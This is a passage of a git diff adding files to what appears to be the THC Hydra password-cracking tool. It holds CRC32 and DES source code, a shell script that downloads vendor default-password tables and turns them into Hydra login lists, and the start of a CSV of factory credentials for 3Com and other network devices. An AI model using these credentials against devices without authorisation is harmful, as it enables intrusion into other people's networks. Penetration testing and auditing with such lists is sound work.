0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, + 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, + 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, + 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, + 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, + 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, + 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, + 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, + 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, + 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, + 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, + 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d +}; + +unsigned int crc32(const void *buf, unsigned int size) { + const unsigned char *p; + unsigned int crc; + + p = buf; + crc = ~0U; + + while (size--) + crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8); + + return crc ^ ~0U; +} diff --git a/crc32.h b/crc32.h new file mode 100644 index 0000000..9555e0f --- /dev/null +++ b/crc32.h @@ -0,0 +1,8 @@ +#ifndef CRC32_H +#define CRC32_H + +#include + +unsigned int crc32(const void *buf, unsigned int size); + +#endif diff --git a/d3des.c b/d3des.c new file mode 100644 index 0000000..9dc4912 --- /dev/null +++ b/d3des.c @@ -0,0 +1,469 @@ + +/* 2001 van Hauser for Hydra: commented out KnR Kn3 and Df_Key to remove + compiler warnings for unused definitions. + */ + +/* + * This is D3DES (V5.09) by Richard Outerbridge with the double and + * triple-length support removed for use in VNC. Also the bytebit[] array + * has been reversed so that the most significant bit in each byte of the + * key is ignored, not the least significant. + * + * These changes are: + * Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved. + * + * This software is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + */ + +/* D3DES (V5.09) - + * + * A portable, public domain, version of the Data Encryption Standard. + * + * Written with Symantec's THINK (Lightspeed) C by Richard Outerbridge. + * Thanks to: Dan Hoey for his excellent Initial and Inverse permutation + * code; Jim Gillogly & Phil Karn for the DES key schedule code; Dennis + * Ferguson, Eric Young and Dana How for comparing notes; and Ray Lau, + * for humouring me on. + * + * Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge. + * (GEnie : OUTER; CIS : [71755,204]) Graven Imagery, 1992. + */ + +#include "d3des.h" + +static void scrunch(unsigned char *, unsigned long *); +static void unscrun(unsigned long *, unsigned char *); +static void desfunc(unsigned long *, unsigned long *); +static void cookey(unsigned long *); + +static unsigned long KnL[32] = { 0L }; + +/* not needed ... + static unsigned long KnR[32] = { 0L }; + static unsigned long Kn3[32] = { 0L }; + static unsigned char Df_Key[24] = { + 0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef, + 0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10, + 0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 }; +*/ + +static unsigned short bytebit[8] = { + 01, 02, 04, 010, 020, 040, 0100, 0200 +}; + +static unsigned long bigbyte[24] = { + 0x800000L, 0x400000L, 0x200000L, 0x100000L, + 0x80000L, 0x40000L, 0x20000L, 0x10000L, + 0x8000L, 0x4000L, 0x2000L, 0x1000L, + 0x800L, 0x400L, 0x200L, 0x100L, + 0x80L, 0x40L, 0x20L, 0x10L, + 0x8L, 0x4L, 0x2L, 0x1L +}; + +/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */ + +static unsigned char pc1[56] = { + 56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17, + 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, + 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, + 13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3 +}; + +static unsigned char totrot[16] = { + 1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28 +}; + +static unsigned char pc2[48] = { + 13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9, + 22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1, + 40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47, + 43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 +}; + +void deskey(key, edf) /* Thanks to James Gillogly & Phil Karn! */ + unsigned char *key; + int edf; +{ + register int i, j, l, m, n; + unsigned char pc1m[56], pcr[56]; + unsigned long kn[32]; + + for (j = 0; j < 56; j++) { + l = pc1[j]; + m = l & 07; + pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0; + } + for (i = 0; i < 16; i++) { + if (edf == DE1) + m = (15 - i) << 1; + else + m = i << 1; + n = m + 1; + kn[m] = kn[n] = 0L; + for (j = 0; j < 28; j++) { + l = j + totrot[i]; + if (l < 28) + pcr[j] = pc1m[l]; + else + pcr[j] = pc1m[l - 28]; + } + for (j = 28; j < 56; j++) { + l = j + totrot[i]; + if (l < 56) + pcr[j] = pc1m[l]; + else + pcr[j] = pc1m[l - 28]; + } + for (j = 0; j < 24; j++) { + if (pcr[pc2[j]]) + kn[m] |= bigbyte[j]; + if (pcr[pc2[j + 24]]) + kn[n] |= bigbyte[j]; + } + } + cookey(kn); + return; +} + +static void cookey(raw1) + register unsigned long *raw1; +{ + register unsigned long *cook, *raw0; + unsigned long dough[32]; + register int i; + + cook = dough; + for (i = 0; i < 16; i++, raw1++) { + raw0 = raw1++; + *cook = (*raw0 & 0x00fc0000L) << 6; + *cook |= (*raw0 & 0x00000fc0L) << 10; + *cook |= (*raw1 & 0x00fc0000L) >> 10; + *cook++ |= (*raw1 & 0x00000fc0L) >> 6; + *cook = (*raw0 & 0x0003f000L) << 12; + *cook |= (*raw0 & 0x0000003fL) << 16; + *cook |= (*raw1 & 0x0003f000L) >> 4; + *cook++ |= (*raw1 & 0x0000003fL); + } + usekey(dough); + return; +} + +void cpkey(into) + register unsigned long *into; +{ + register unsigned long *from, *endp; + + from = KnL, endp = &KnL[32]; + while (from < endp) + *into++ = *from++; + return; +} + +void usekey(from) + register unsigned long *from; +{ + register unsigned long *to, *endp; + + to = KnL, endp = &KnL[32]; + while (to < endp) + *to++ = *from++; + return; +} + +void des(unsigned char *inblock, unsigned char *outblock) { + unsigned long work[2]; + + scrunch(inblock, work); + desfunc(work, KnL); + unscrun(work, outblock); + return; +} + +static void scrunch(outof, into) + register unsigned char *outof; + register unsigned long *into; +{ + *into = (*outof++ & 0xffL) << 24; + *into |= (*outof++ & 0xffL) << 16; + *into |= (*outof++ & 0xffL) << 8; + *into++ |= (*outof++ & 0xffL); + *into = (*outof++ & 0xffL) << 24; + *into |= (*outof++ & 0xffL) << 16; + *into |= (*outof++ & 0xffL) << 8; + *into |= (*outof & 0xffL); + return; +} + +static void unscrun(outof, into) + register unsigned long *outof; + register unsigned char *into; +{ + *into++ = (*outof >> 24) & 0xffL; + *into++ = (*outof >> 16) & 0xffL; + *into++ = (*outof >> 8) & 0xffL; + *into++ = *outof++ & 0xffL; + *into++ = (*outof >> 24) & 0xffL; + *into++ = (*outof >> 16) & 0xffL; + *into++ = (*outof >> 8) & 0xffL; + *into = *outof & 0xffL; + return; +} + +static unsigned long SP1[64] = { + 0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L, + 0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L, + 0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L, + 0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L, + 0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L, + 0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L, + 0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L, + 0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L, + 0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L, + 0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L, + 0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L, + 0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L, + 0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L, + 0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L, + 0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L, + 0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L +}; + +static unsigned long SP2[64] = { + 0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L, + 0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L, + 0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L, + 0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L, + 0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L, + 0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L, + 0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L, + 0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L, + 0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L, + 0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L, + 0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L, + 0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L, + 0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L, + 0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L, + 0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L, + 0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L +}; + +static unsigned long SP3[64] = { + 0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L, + 0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L, + 0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L, + 0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L, + 0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L, + 0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L, + 0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L, + 0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L, + 0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L, + 0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L, + 0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L, + 0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L, + 0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L, + 0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L, + 0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L, + 0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L +}; + +static unsigned long SP4[64] = { + 0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L, + 0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L, + 0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L, + 0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L, + 0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L, + 0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L, + 0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L, + 0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L, + 0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L, + 0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L, + 0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L, + 0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L, + 0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L, + 0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L, + 0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L, + 0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L +}; + +static unsigned long SP5[64] = { + 0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L, + 0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L, + 0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L, + 0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L, + 0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L, + 0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L, + 0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L, + 0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L, + 0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L, + 0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L, + 0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L, + 0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L, + 0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L, + 0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L, + 0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L, + 0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L +}; + +static unsigned long SP6[64] = { + 0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L, + 0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L, + 0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L, + 0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L, + 0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L, + 0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L, + 0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L, + 0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L, + 0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L, + 0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L, + 0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L, + 0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L, + 0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L, + 0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L, + 0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L, + 0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L +}; + +static unsigned long SP7[64] = { + 0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L, + 0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L, + 0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L, + 0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L, + 0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L, + 0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L, + 0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L, + 0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L, + 0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L, + 0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L, + 0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L, + 0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L, + 0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L, + 0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L, + 0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L, + 0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L +}; + +static unsigned long SP8[64] = { + 0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L, + 0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L, + 0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L, + 0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L, + 0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L, + 0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L, + 0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L, + 0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L, + 0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L, + 0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L, + 0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L, + 0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L, + 0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L, + 0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L, + 0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L, + 0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L +}; + +static void desfunc(block, keys) + register unsigned long *block, *keys; +{ + register unsigned long fval, work, right, leftt; + register int round; + + leftt = block[0]; + right = block[1]; + work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL; + right ^= work; + leftt ^= (work << 4); + work = ((leftt >> 16) ^ right) & 0x0000ffffL; + right ^= work; + leftt ^= (work << 16); + work = ((right >> 2) ^ leftt) & 0x33333333L; + leftt ^= work; + right ^= (work << 2); + work = ((right >> 8) ^ leftt) & 0x00ff00ffL; + leftt ^= work; + right ^= (work << 8); + right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL; + work = (leftt ^ right) & 0xaaaaaaaaL; + leftt ^= work; + right ^= work; + leftt = ((leftt << 1) | ((leftt >> 31) & 1L)) & 0xffffffffL; + + for (round = 0; round < 8; round++) { + work = (right << 28) | (right >> 4); + work ^= *keys++; + fval = SP7[work & 0x3fL]; + fval |= SP5[(work >> 8) & 0x3fL]; + fval |= SP3[(work >> 16) & 0x3fL]; + fval |= SP1[(work >> 24) & 0x3fL]; + work = right ^ *keys++; + fval |= SP8[work & 0x3fL]; + fval |= SP6[(work >> 8) & 0x3fL]; + fval |= SP4[(work >> 16) & 0x3fL]; + fval |= SP2[(work >> 24) & 0x3fL]; + leftt ^= fval; + work = (leftt << 28) | (leftt >> 4); + work ^= *keys++; + fval = SP7[work & 0x3fL]; + fval |= SP5[(work >> 8) & 0x3fL]; + fval |= SP3[(work >> 16) & 0x3fL]; + fval |= SP1[(work >> 24) & 0x3fL]; + work = leftt ^ *keys++; + fval |= SP8[work & 0x3fL]; + fval |= SP6[(work >> 8) & 0x3fL]; + fval |= SP4[(work >> 16) & 0x3fL]; + fval |= SP2[(work >> 24) & 0x3fL]; + right ^= fval; + } + + right = (right << 31) | (right >> 1); + work = (leftt ^ right) & 0xaaaaaaaaL; + leftt ^= work; + right ^= work; + leftt = (leftt << 31) | (leftt >> 1); + work = ((leftt >> 8) ^ right) & 0x00ff00ffL; + right ^= work; + leftt ^= (work << 8); + work = ((leftt >> 2) ^ right) & 0x33333333L; + right ^= work; + leftt ^= (work << 2); + work = ((right >> 16) ^ leftt) & 0x0000ffffL; + leftt ^= work; + right ^= (work << 16); + work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL; + leftt ^= work; + right ^= (work << 4); + *block++ = right; + *block = leftt; + return; +} + +/* Validation sets: + * + * Single-length key, single-length plaintext - + * Key : 0123 4567 89ab cdef + * Plain : 0123 4567 89ab cde7 + * Cipher : c957 4425 6a5e d31d + * + * Double-length key, single-length plaintext - + * Key : 0123 4567 89ab cdef fedc ba98 7654 3210 + * Plain : 0123 4567 89ab cde7 + * Cipher : 7f1d 0a77 826b 8aff + * + * Double-length key, double-length plaintext - + * Key : 0123 4567 89ab cdef fedc ba98 7654 3210 + * Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff + * Cipher : 27a0 8440 406a df60 278f 47cf 42d6 15d7 + * + * Triple-length key, single-length plaintext - + * Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567 + * Plain : 0123 4567 89ab cde7 + * Cipher : de0b 7c06 ae5e 0ed5 + * + * Triple-length key, double-length plaintext - + * Key : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567 + * Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff + * Cipher : ad0d 1b30 ac17 cf07 0ed1 1c63 81e4 4de5 + * + * d3des V5.0a rwo 9208.07 18:44 Graven Imagery + **********************************************************************/ diff --git a/d3des.h b/d3des.h new file mode 100644 index 0000000..21a2003 --- /dev/null +++ b/d3des.h @@ -0,0 +1,56 @@ + +/* + * This is D3DES (V5.09) by Richard Outerbridge with the double and + * triple-length support removed for use in VNC. + * + * These changes are: + * Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved. + * + * This software is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + */ + +/* d3des.h - + * + * Headers and defines for d3des.c + * Graven Imagery, 1992. + * + * Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge + * (GEnie : OUTER; CIS : [71755,204]) + */ + +#define EN0 0 /* MODE == encrypt */ +#define DE1 1 /* MODE == decrypt */ + +extern void deskey(unsigned char *, int); + +/* hexkey[8] MODE + * Sets the internal key register according to the hexadecimal + * key contained in the 8 bytes of hexkey, according to the DES, + * for encryption or decryption according to MODE. + */ + +extern void usekey(unsigned long *); + +/* cookedkey[32] + * Loads the internal key register with the data in cookedkey. + */ + +extern void cpkey(unsigned long *); + +/* cookedkey[32] + * Copies the contents of the internal key register into the storage + * located at &cookedkey[0]. + */ + +extern void des(unsigned char *, unsigned char *); + +/* from[8] to[8] + * Encrypts/Decrypts (according to the key currently loaded in the + * internal key register) one block of eight bytes at address 'from' + * into the block at address 'to'. They can be the same. + */ + +/* d3des.h V5.09 rwo 9208.04 15:06 Graven Imagery + ********************************************************************/ diff --git a/dpl4hydra.sh b/dpl4hydra.sh new file mode 100755 index 0000000..94f9aab --- /dev/null +++ b/dpl4hydra.sh @@ -0,0 +1,187 @@ +#!/bin/sh +# +# Name: dpl4hydra +# Version: 0.9.9 +# Date: 2012-04-16 +# Author: Roland Kessler / Twitter: @rokessler +# Synopsis: Generates a (d)efault (p)assword (l)ist as input for THC hydra. +# Credits: Thanks to van Hauser for support and fixing portability issues. +# "The universe is an intelligence test." -Timothy Leary (R.I.P.) + +INSTALLDIR=/usr/local +LOCATION=etc + +usage () +{ +cat </dev/null 2>&1 && FETCH="wget -q -O -" + which curl >/dev/null 2>&1 && FETCH="curl -s" + + if [ -n "$FETCH" ]; then + echo "done." + echo "Using `echo $FETCH | cut -d ' ' -f 1` for downloading data." + echo + else + echo + echo "ERROR: Cannot refresh the list without wget or curl. Aborting." >&2 + echo + exit 1 + fi + + echo "Trying to download list of vendors from" + echo "${SITE}... " | tr -d "\n" + $FETCH $SITE > $INDEXSITE 2>/dev/null || { echo; echo; echo "ERROR: Downloading data to disk failed. Network down?" >&2; echo; rm $INDEXSITE; exit 1; } + echo "done." + echo + + cat $INDEXSITE | grep td | awk -F"\"" '{ print $8 }' | grep http > $SUBSITES + rm $INDEXSITE + + if [ -r $FULLFILE ]; then + echo "Moving existing password list to ${OLDFILE}." + echo + mv $FULLFILE $OLDFILE || { echo "ERROR: Moving file $FULLFILE failed. Please check." >&2; echo; exit 1; } + fi + + for SUBSITE in `cat $SUBSITES`; do + VENDOR=`echo $SUBSITE | awk -F"-" '{ print $3 }' | sed 's/.htm//'` + echo "Downloading default passwords for ${VENDOR}... " | tr -d "\n" + $FETCH $SUBSITE | grep -i tr | grep -i td | grep -i celltext | sed 's/<[^>]*>/,/g' | sed 's/,,*/,/g' | sed 's/^,//g' | tr -d "\r" >dpl4hydra_${VENDOR}.tmp || { echo "not found - skipping... " | tr -d "\n" ; } + + while read SYSTEM; do + echo "${VENDOR}," | tr -d "\n" >> $FULLFILE + echo "$SYSTEM" >> $FULLFILE + done < dpl4hydra_${VENDOR}.tmp + + rm dpl4hydra_${VENDOR}.tmp + echo "done." + done + rm $SUBSITES + + if [ ! -r $LOCALFILE ]; then + echo + echo "ERROR: Cannot access local file ${LOCALFILE}. Skipping." >&2 + echo + else + echo + echo "Merging download with ${LOCALFILE}... " | tr -d "\n" + cat $LOCALFILE >> $FULLFILE || { echo; echo "ERROR: Merging of $FULLFILE and $LOCALFILE failed. Please check." >&2; echo; exit 1; } + echo "done." + fi + + echo "Cleaning up and sorting ${FULLFILE}... " | tr -d "\n" + cat $FULLFILE | sed 's/(null)//g' | sed 's/(Null)//g' | sed 's/(NULL)//g' | sed 's/(blank)//g' | sed 's/(Blank)//g' | sed 's/(BLANK)//g' | sed 's/(none)//g' | sed 's/(None)//g' | sed 's/(NONE)//g' | sed 's/none//g' | sed 's/n\/a//g' | sed 's/<//g' | sed 's/ //g' | sort | uniq > $CLEANFILE + mv $CLEANFILE $FULLFILE + echo "done." + echo + echo "Refreshed (d)efault (p)assword (l)ist $FULLFILE" + echo "was created with `wc -l $FULLFILE | awk '{ print $1 }'` entries." + echo +} + +generate () +{ + HYDRAFILE=`echo "dpl4hydra_${BRAND}.lst" | tr '/ =:@\\|;<>"'"'" '_____________'` + + if [ ! -r $FULLFILE ]; then + echo + echo "ERROR: Cannot access input file ${FULLFILE}" >&2 + echo " You can rebuild it with '`basename $0` refresh'." >&2 + echo + echo " Trying to use $LOCALFILE instead... " | tr -d "\n" + if [ -r $LOCALFILE ]; then + FULLFILE=$LOCALFILE + echo "done." + else + echo + echo "ERROR: Cannot access local file ${LOCALFILE}. Aborting." >&2 + echo + exit 1 + fi + fi + + cat $FULLFILE 2>/dev/null | grep -i "$PATTERN" | awk -F"," '{ print $5":"$6 }' | sed 's/^[ \t]*//' | sed 's/[ \t]*$//' | sort | uniq > $HYDRAFILE + + ENTRIES=`wc -l $HYDRAFILE | awk '{ print $1 }'` + if [ "$ENTRIES" -eq 0 ]; then + rm -f $HYDRAFILE + echo + echo "ERROR: No matching entries found for $BRAND systems." >&2 + echo " File $HYDRAFILE was not created." >&2 + echo + exit 1 + else + if [ "$ENTRIES" -eq 1 ]; then + echo + echo "File $HYDRAFILE was created with one entry." + echo + else + echo + echo "File $HYDRAFILE was created with $ENTRIES entries." + echo + fi + fi +} + +LC_ALL=C +export LC_ALL +DPLPATH="." +test -r "$DPLPATH/dpl4hydra_full.csv" || DPLPATH="$INSTALLDIR/$LOCATION" +FULLFILE="$DPLPATH/dpl4hydra_full.csv" +OLDFILE="$DPLPATH/dpl4hydra_full.old" +LOCALFILE="$DPLPATH/dpl4hydra_local.csv" +INDEXSITE="$DPLPATH/dpl4hydra_index.tmp" +SUBSITES="$DPLPATH/dpl4hydra_subs.tmp" +CLEANFILE="$DPLPATH/dpl4hydra_clean.tmp" +SITE="http://open-sez.me/passwd.htm" + +case $# in + 0) usage + exit 0;; + 1) OPT=`echo $1 | tr "[A-Z]" "[a-z]"`;; + *) echo + echo "ERROR: Too many options." >&2 + usage + exit 1;; +esac + +case "$OPT" in + "-h" | "help" | "-help" | "--help") usage;; + "-r" | "refresh" | "-refresh" | "--refresh") refresh;; + "-a" | "all" | "-all" | "--all") PATTERN="," + BRAND="all" + generate;; + *) PATTERN="${OPT}" + BRAND="$OPT" + generate;; +esac diff --git a/dpl4hydra_full.csv b/dpl4hydra_full.csv new file mode 100755 index 0000000..21bb776 --- /dev/null +++ b/dpl4hydra_full.csv @@ -0,0 +1,8807 @@ +2wire,Wireless Routers (most models),,http,,Wireless,Admin,, +360systems,Image Server 2000,,,factory,factory,,, +3com,,,,adm,,,, +3com,,,,admin,synnet,,, +3com,,,,manager,manager,,, +3com,,,,monitor,monitor,,, +3com,,,,read,synnet,,, +3com,,,,root,letmein,,1.25, +3com,,,,security,security,,, +3com,,,,write,synnet,,, +3com,3C16405,,,admin,,,, +3com,3C16405,,Console,Administrator,,Admin,, +3com,3C16405,,Multi,,,Admin,, +3com,3C16405,,Multi,admin,,Admin,, +3com,3C16406,,,admin,,,, +3com,3C16406,,Multi,admin,,Admin,telnet or serial, +3com,3C16450,,,admin,,,, +3com,3C16450,,Multi,admin,,Admin,telnet or serial, +3com,3CRADSL72 ,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community, +3com,3CRWE52196,,,,admin,,, +3com,3Com SuperStack 3 Switch 3300XM,,,security,security,,, +3com,3Com SuperStack 3 Switch 3300XM,,Admin,security,security,,, +3com,3c16405,,,,,,, +3com,3c16405,,,Administrator,,,, +3com,812,,HTTP,Administrator,admin,Admin,, +3com,AirConnect AP,,,,comcomcom,,, +3com,AirConnect Access Point,,01.50-01,,,,, +3com,AirConnect Access Point,,Admin,,,,, +3com,AirConnect Access Point,,SNMP,,comcomcom,,, +3com,AirConnect Access 